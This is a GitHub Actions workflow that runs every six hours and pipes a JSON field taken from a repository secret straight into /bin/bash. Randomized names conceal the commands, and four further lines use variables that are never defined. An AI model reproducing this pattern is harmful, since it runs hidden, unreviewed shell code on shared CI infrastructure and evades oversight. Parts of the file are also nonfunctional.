name: chentihaoda

on:
  workflow_dispatch:
  schedule:
    - cron: '39 1/6 * * *'
jobs:  # 9148
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: chentihaoda
        env:
          umqod25: ${{ secrets.umqod25 }}
        run: |
          echo $umqod25 | jq -r .yazj84 | /bin/bash
          echo $qbi58 | jq -r .ijvzh92861 | /bin/bash
          echo $amo0103 | jq -r .i9257 | /bin/bash
          echo $dvx5673 | jq -r .nuggm420 | /bin/bash
          echo $ids244 | jq -r .nbuu8236 | /bin/bash

